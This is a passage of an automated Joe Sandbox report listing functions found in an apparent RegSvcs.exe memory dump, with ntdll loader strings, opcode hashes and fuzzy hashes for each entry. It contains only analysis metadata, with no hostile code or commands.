                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                            • API String ID: 0-2558761708
                                            • Opcode ID: 7ce069af0a7394bc2bf171e5ad89652a3a0c01645ecd71c43d91ec97bbec887e
                                            • Instruction ID: cfa4e748dce2e5db59cc3f988d50d48d1522091b87e0e62c1f259595ad520416
                                            • Opcode Fuzzy Hash: 7ce069af0a7394bc2bf171e5ad89652a3a0c01645ecd71c43d91ec97bbec887e
                                            • Instruction Fuzzy Hash: 4B11EE713181069FDB29CA18C480F3AF3A5EF82B1AF18816DF406CB252EB34EB41C791
                                            Function 018E20DE Relevance: 3.8, Strings: 3, Instructions: 41COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrpInitializationFailure, xrefs: 018E20FA
                                            • minkernel\ntdll\ldrinit.c, xrefs: 018E2104
                                            • Process initialization failed with status 0x%08lx, xrefs: 018E20F3
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                            • API String ID: 0-2986994758
                                            • Opcode ID: 3f54418a73d4ba3489ba70eedb5cb7aef3996814f39e7ba6fd9a2da122aaf783
                                            • Instruction ID: 0b26bb4ee8b311a035c434272450d81cb8177351180f3544c05baf7020192db8
                                            • Opcode Fuzzy Hash: 3f54418a73d4ba3489ba70eedb5cb7aef3996814f39e7ba6fd9a2da122aaf783
                                            • Instruction Fuzzy Hash: 61F0A43564070C6BE724D64C9C46F993BA9EB41B54F540059F600FB285D6B4A7408B91
                                            Function 018703E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: ___swprintf_l
                                            • String ID: #%u
                                            • API String ID: 48624451-232158463
                                            • Opcode ID: cc3ed2705b98fb5c794a313f2d5726e6c06b9a775d08f22f6a111d69dfc08d76
                                            • Instruction ID: e891bb7aa513c229ac11f48f27aa87c484ed365d8ff664ecaaecce38ae3cf0dc
                                            • Opcode Fuzzy Hash: cc3ed2705b98fb5c794a313f2d5726e6c06b9a775d08f22f6a111d69dfc08d76
                                            • Instruction Fuzzy Hash: 96710A71A0014A9FDB05DFA8C994BAEBBF8FF18704F154069E905E7251EB34EA41CB62
                                            Function 0186A9D0 Relevance: 2.9, Strings: 2, Instructions: 421COMMON
                                            Download Yara Rule
                                            Strings
                                            • LdrResSearchResource Exit, xrefs: 0186AA25
                                            • LdrResSearchResource Enter, xrefs: 0186AA13
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                            • API String ID: 0-4066393604
                                            • Opcode ID: 4ed48e7f7b93fc26a32335d3fe734f3c5966569b5450de1833b2bd0785f420b9
                                            • Instruction ID: 1908eeeaf9a558e54dd3b3f9d9271cd5b896fb96e5d32e28be80c547f0212a4b
                                            • Opcode Fuzzy Hash: 4ed48e7f7b93fc26a32335d3fe734f3c5966569b5450de1833b2bd0785f420b9
                                            • Instruction Fuzzy Hash: 4BE17C71A00219AFEB268E9DD980BAEBBBAFF44714F14442AE901F7291D734DB41CB51
                                            Function 0192A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: `$`
                                            • API String ID: 0-197956300
                                            • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction ID: 9876168fb5a62e5ecbb02f385946be8bb19e4b47a325f3d6b7db5c0983fc5d94
                                            • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                            • Instruction Fuzzy Hash: 71C1E2322043529BE725CF28C840B2BBBE9BFD4719F084A2DF69ACB694D774D505CB42
                                            Function 018DE6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Legacy$UEFI
                                            • API String ID: 2994545307-634100481
                                            • Opcode ID: 26816abe316882c86712819c2a07639249619b2ab42b019b7c55b1d5565da41f
                                            • Instruction ID: 3c37c044adf7dc54fec39d6a97fb08f1a3ed937eeca892b39908fb99f5ecf0b7
                                            • Opcode Fuzzy Hash: 26816abe316882c86712819c2a07639249619b2ab42b019b7c55b1d5565da41f
                                            • Instruction Fuzzy Hash: 8B616E71E007199FDB24DFA8C881BAEBBB9FB44704F54406DE649EB291DB31EA40CB50
                                            Function 019043D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: @$MUI
                                            • API String ID: 0-17815947
                                            • Opcode ID: 8759a80b33daf4d7d8eba318f22e74e0431a22726d6faac210603c3cf41d945e
                                            • Instruction ID: c88db7dbedebf7e124f4ee8fcff94165b5c40ce5b15edd6f0519fea8dc073fdf
                                            • Opcode Fuzzy Hash: 8759a80b33daf4d7d8eba318f22e74e0431a22726d6faac210603c3cf41d945e
                                            • Instruction Fuzzy Hash: D751F971E0021DAFEB11DFA9CC80AEEBBBDAB44754F100529E615F7290D631AA05CB61
                                            Function 018604E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 0186063D
                                            • kLsE, xrefs: 01860540
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                            • API String ID: 0-2547482624
                                            • Opcode ID: e47435d5ccacbc34068a67daf1e396d6785b91bd87fc8c5391018ad7e6713bdd
                                            • Instruction ID: a2eb22fc2258c512421b054d2119ddab49818795ec7a2c2f79e0cdf39616eb61
                                            • Opcode Fuzzy Hash: e47435d5ccacbc34068a67daf1e396d6785b91bd87fc8c5391018ad7e6713bdd
                                            • Instruction Fuzzy Hash: BF51D0715047468FD725EF68C4446A7BBE8AF84304F10483EFADAC7241E774DA45CB9A
                                            Function 0186A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                            Download Yara Rule
                                            Strings
                                            • RtlpResUltimateFallbackInfo Enter, xrefs: 0186A2FB
                                            • RtlpResUltimateFallbackInfo Exit, xrefs: 0186A309
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                            • API String ID: 0-2876891731
                                            • Opcode ID: 269f4d349f87d1813255ade377f0c835fd7a31de7a71719fac87b3326db88498
                                            • Instruction ID: ff4a1da4315093e61c8d7264f8355fbf41c63bd1e09a22e5732bb1d0f3e221d8
                                            • Opcode Fuzzy Hash: 269f4d349f87d1813255ade377f0c835fd7a31de7a71719fac87b3326db88498
                                            • Instruction Fuzzy Hash: 5341BE30A04649DBDB19CF5DC940B6ABBB9FF85704F1440A9EA00EB291E7B5DB40CB51
                                            Function 0189A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID: InitializeThunk
                                            • String ID: Cleanup Group$Threadpool!
                                            • API String ID: 2994545307-4008356553
                                            • Opcode ID: e9f41f25089bf183b88bd52fd197aa702d3f05f9b8752f0e24289eb1aa31536f
                                            • Instruction ID: 12fe8ee1d8e04a7128294c5c9d8fe80c962feb335101a51029c1228cdc79000b
                                            • Opcode Fuzzy Hash: e9f41f25089bf183b88bd52fd197aa702d3f05f9b8752f0e24289eb1aa31536f
                                            • Instruction Fuzzy Hash: ED0128B2244704AFD322DF14CD85F167BE8E784B16F098939B648C7590E374DA04CB86
                                            Function 0186C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: MUI
                                            • API String ID: 0-1339004836
                                            • Opcode ID: 67867275d4b1806f6f904f7af4ec04b0e6603d0f6d74edf2b9a28eb41ba434e0
                                            • Instruction ID: 3d953884617f53df3f24e98fe1b7ba4b33a2af5a23a560b9407827139cc8ecb4
                                            • Opcode Fuzzy Hash: 67867275d4b1806f6f904f7af4ec04b0e6603d0f6d74edf2b9a28eb41ba434e0
                                            • Instruction Fuzzy Hash: 79826B75E002588FEB25CFA9C880BEDBBB9BF48314F148169D999EB351D730AE41CB50
                                            Function 018E6420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 9d13db7a34bc0ec5353257f380f948b0f86d7c9d7bb955280467f0bcb9b22c35
                                            • Instruction ID: 101a4d1b177f445791c259b3658b753fab20d2f4f412e68af36cf2c83d5cb898
                                            • Opcode Fuzzy Hash: 9d13db7a34bc0ec5353257f380f948b0f86d7c9d7bb955280467f0bcb9b22c35
                                            • Instruction Fuzzy Hash: C0915371A40219AFEB21EB99CD85FAE7BB9EF15B50F200065F600EB191E774EA00CB51
                                            Function 0190E10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID: 0-3916222277
                                            • Opcode ID: 699f5f65a7a30301c98156b3062281a59f3bceb715b63f768fd1351ef02e5126
                                            • Instruction ID: 68f96d2650ccd0f65e370b216dcc6a1a9e43d6054a4e0d1260a4dee32b6184a4
                                            • Opcode Fuzzy Hash: 699f5f65a7a30301c98156b3062281a59f3bceb715b63f768fd1351ef02e5126
                                            • Instruction Fuzzy Hash: EE918172901609BFDB23EBA9DC44FAFBB79EF85740F140819F509A7290E7749A01CB52
                                            Function 0189A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: GlobalTags
                                            • API String ID: 0-1106856819
                                            • Opcode ID: 39efddbf4ae73ed36641765d23b635e111de051b63f65dce85b4dc2014b97ebb
                                            • Instruction ID: e2e8621b078ff9ad5ef5a18494259a0d6efd294f167238c74aa941259960a9d7
                                            • Opcode Fuzzy Hash: 39efddbf4ae73ed36641765d23b635e111de051b63f65dce85b4dc2014b97ebb
                                            • Instruction Fuzzy Hash: 487149B5E0030E9BDF29DF9CD5916ADBBB1BF88714F24812AE905E7241E7309A41CB60
                                            Function 01904978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: .mui
                                            • API String ID: 0-1199573805
                                            • Opcode ID: 5e5c1c30d89f191ad2ba4b03a6d309951d92261358c4fd4f3e44ede2e7f6fb46
                                            • Instruction ID: db715e7b658f81864ae2186d47ed8db7c37c6f420e0d4dac2c90785a56668dbb
                                            • Opcode Fuzzy Hash: 5e5c1c30d89f191ad2ba4b03a6d309951d92261358c4fd4f3e44ede2e7f6fb46
                                            • Instruction Fuzzy Hash: 0C518472D0062A9FDF12DF99D840AAEBBB8AF08B10F054129EB15F7290D7749901CBE4
                                            Function 0187E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: EXT-
                                            • API String ID: 0-1948896318
                                            • Opcode ID: 7807f1050c3733bf4a05e7171a404b809979c25f427a5af00fd3f38d25140e71
                                            • Instruction ID: b178b83c1e134fe9c4b14a2e1d99ddca11d8d6baffae07a02da90ef336076b88
                                            • Opcode Fuzzy Hash: 7807f1050c3733bf4a05e7171a404b809979c25f427a5af00fd3f38d25140e71
                                            • Instruction Fuzzy Hash: C24191725083429BD711DA79C980B6BB7E8EF88B58F44496DFA84D7140E774DB04C793
                                            Function 018DC730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: BinaryHash
                                            • API String ID: 0-2202222882
                                            • Opcode ID: bf2c5be1b0232fc8aa265928051381a1f5462dfa61bcb655f5c1a4b273523177
                                            • Instruction ID: 02b9e4d8a7543f4290ca23da9ca2478ee5b5e2ed54a7d4e92dda62c046c68c4e
                                            • Opcode Fuzzy Hash: bf2c5be1b0232fc8aa265928051381a1f5462dfa61bcb655f5c1a4b273523177
                                            • Instruction Fuzzy Hash: 3C4131B1D0022DABDB219A64CC85FDEB77CAB45714F0045A9EB08EB141DB709F89CFA5
                                            Function 018F6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: #
                                            • API String ID: 0-1885708031
                                            • Opcode ID: ff20ade139b0485853ea31132dec1d00d9d607a12d49b87d607d4e335e4bc675
                                            • Instruction ID: df9353802f941a9941f3d04471487477ca819d87de587feec5e9c61107316711
                                            • Opcode Fuzzy Hash: ff20ade139b0485853ea31132dec1d00d9d607a12d49b87d607d4e335e4bc675
                                            • Instruction Fuzzy Hash: 43312A31A007099BEB22DB6DC850BAE7BB8DF15704F64412CEA81EB282E775DE05CB50
                                            Function 018E892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                            Download Yara Rule
                                            Strings
                                            • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 018E895E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                            • API String ID: 0-702105204
                                            • Opcode ID: 386c40cda5d04078dae73627ae14c394f046b76a6c8f32a90e5cc02ef2237fbd
                                            • Instruction ID: 0989e477d0500081fd283431be345f0db26a769b4ab4512b6b7c6c75607b77dd
                                            • Opcode Fuzzy Hash: 386c40cda5d04078dae73627ae14c394f046b76a6c8f32a90e5cc02ef2237fbd
                                            • Instruction Fuzzy Hash: 6C01F732A043059BF731BA59988CA5E7FE5EF93394B05001CF641A7152CB60AE41C793
                                            Function 01902000 Relevance: .8, Instructions: 757COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 1c70d683937f56a20afa5e5c2676956cd7a5af2ee70324df5d30cbeb99277e58
                                            • Instruction ID: 6524af82cff49c64bff7b52b0add9c6e61bc35977e7c1825d55b61a482fa2c33
                                            • Opcode Fuzzy Hash: 1c70d683937f56a20afa5e5c2676956cd7a5af2ee70324df5d30cbeb99277e58
                                            • Instruction Fuzzy Hash: 8642E6356083419FE726CF68C894A6BBBE9BF84700F18092DFA8AD7290D771D945CB53
                                            Function 018F8158 Relevance: .6, Instructions: 617COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 77a60a74b47e20a562f635b4f39068b7d41310bec646c7fc43f51792125621fb
                                            • Instruction ID: dfe124eaeca5c0bfad80d3b39c7e5a3c44fcdc152b38de1f22b3616c2c38acbd
                                            • Opcode Fuzzy Hash: 77a60a74b47e20a562f635b4f39068b7d41310bec646c7fc43f51792125621fb
                                            • Instruction Fuzzy Hash: C4425E75E102198FEB24CF69C881BADBBF5BF49300F14809DEA49EB252D7349A85CF51
                                            Function 01872840 Relevance: .6, Instructions: 605COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 499b311ab8f6cb1580c462f04cc5790ae3b8108eef7d3ba3257582e3a6099689
                                            • Instruction ID: cc22b61de2947f5a39438cc99812e4f083b55aefe4d02698e9b743b3e3025478
                                            • Opcode Fuzzy Hash: 499b311ab8f6cb1580c462f04cc5790ae3b8108eef7d3ba3257582e3a6099689
                                            • Instruction Fuzzy Hash: DD32DF70A047598BDB25CF69C844BBABBF2BF84B04F24412DD58ADB385E735EA41CB50
                                            Function 0190A118 Relevance: .6, Instructions: 591COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: a780b6b4dc346d2ca6af9337a78e9c2f5d6d58252ae508d86b5526e7a0c497f4
                                            • Instruction ID: e6a4284ac44b5d12452bca429d052b99473d0ee5a408c5bb9ba28e0417f5a383
                                            • Opcode Fuzzy Hash: a780b6b4dc346d2ca6af9337a78e9c2f5d6d58252ae508d86b5526e7a0c497f4
                                            • Instruction Fuzzy Hash: 0622BC746047618FEB26CF2DC490776BBF5BF44341F08895AD98A8B2C6D335E492DBA0
                                            Function 01866A50 Relevance: .5, Instructions: 548COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: cebdbfd43f66bf30465b95c848c705ea2168212f3f04c88bb0c5100a24e606ae
                                            • Instruction ID: 42860d01c8433d8e555979df2be77f91cbbe661f5d6ff4bed0ca820c235958ee
                                            • Opcode Fuzzy Hash: cebdbfd43f66bf30465b95c848c705ea2168212f3f04c88bb0c5100a24e606ae
                                            • Instruction Fuzzy Hash: 6C32AF71A00645CFDB25CF68C480BAABBF6FF48304F248569E955EB352E734EA41CB90
                                            Function 01884A35 Relevance: .4, Instructions: 423COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction ID: 8e3d0827bedad42304d9d96a7e7fe29d5b0361dc4b381552b64d112d1119ac7c
                                            • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                            • Instruction Fuzzy Hash: 99F17E72E0061B9BDB15DFA9C580BAEBBF6AF48754F04812DE905EB341E734DA41CB60
                                            Function 018F892B Relevance: .4, Instructions: 386COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 6678162985943c62d937f6a07c799a0d5ba6676ad1df3b8d579636574a660ca1
                                            • Instruction ID: 2ccab9a122ce256405793d6fd827089a78cf3cc38e298ad82594a606e1e85e6d
                                            • Opcode Fuzzy Hash: 6678162985943c62d937f6a07c799a0d5ba6676ad1df3b8d579636574a660ca1
                                            • Instruction Fuzzy Hash: F9D1D071A0060A9FDF15CF69C841BBEB7F1AF89304F18816DDA55E7241E735EA06CB60
                                            Function 018665D0 Relevance: .4, Instructions: 383COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c89dd71d7c2ac4ebdd1f9b83aab1de2171ed8f41f815219a18f3d563ccbeb8a7
                                            • Instruction ID: 9ab983120abb054cf1fa2ea388f0fc89443ae107373d1fcbac60b570d92996b0
                                            • Opcode Fuzzy Hash: c89dd71d7c2ac4ebdd1f9b83aab1de2171ed8f41f815219a18f3d563ccbeb8a7
                                            • Instruction Fuzzy Hash: 64E18071508382CFC715CF28C190A6ABBE5FF89318F158A6DE995C7351EB31EA05CB92
                                            Function 01858397 Relevance: .4, Instructions: 380COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 5a86557411930529a6aac0a656f7a7c059e1d2215564d55f1d16b77193a88243
                                            • Instruction ID: 471146effc5cde122c86df53803e923a7a5d256014f2bffe572bf12bec92fa60
                                            • Opcode Fuzzy Hash: 5a86557411930529a6aac0a656f7a7c059e1d2215564d55f1d16b77193a88243
                                            • Instruction Fuzzy Hash: A2D1E371A0020ADBDB54DF6AC8C0ABA77A5FF56308F04462EED16DB281E730EB55CB51
                                            Function 018E8243 Relevance: .3, Instructions: 322COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction ID: 0ab5b37084b9a6bd523545f5bf1f1fd1bcd20344c2fbd5edaccf6411e31482ff
                                            • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                            • Instruction Fuzzy Hash: CDB17274A00609AFDF24DF99C948AAFBBF9FF86304F14445DAA02D7791DA74EA05CB10
                                            Function 01870535 Relevance: .3, Instructions: 300COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction ID: 9d9e63b663a24cf059fa8bb1d174adf570495566168f04445a1af18c04817574
                                            • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                            • Instruction Fuzzy Hash: 55B1063160464AAFDB25CBA8C850BBEBBF6AF85704F140159E656EB281D730EF81CB51
                                            Function 018683C0 Relevance: .3, Instructions: 281COMMON
                                            Download Yara Rule
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.2216038289.0000000001830000.00000040.00001000.00020000.00000000.sdmp, Offset: 01830000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_1830000_RegSvcs.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 90f10ca645c28eed45449710782453cdd1597bbb4f8341eef5305a0b98c2eeb3
                                            • Instruction ID: 69e76627564a7a2e84b96441477d55a3a477c139a343d27a6dc4936b5af5433c
                                            • Opcode Fuzzy Hash: 90f10ca645c28eed45449710782453cdd1597bbb4f8341eef5305a0b98c2eeb3
                                            • Instruction Fuzzy Hash: 69C14974508341CFE764CF19C498BAAB7E9BF88704F44495DE989C7291E774EA08CF92
                                            Function 0185C427 Relevance: .3, Instructions: 280COMMON
                                            Download Yara Rule
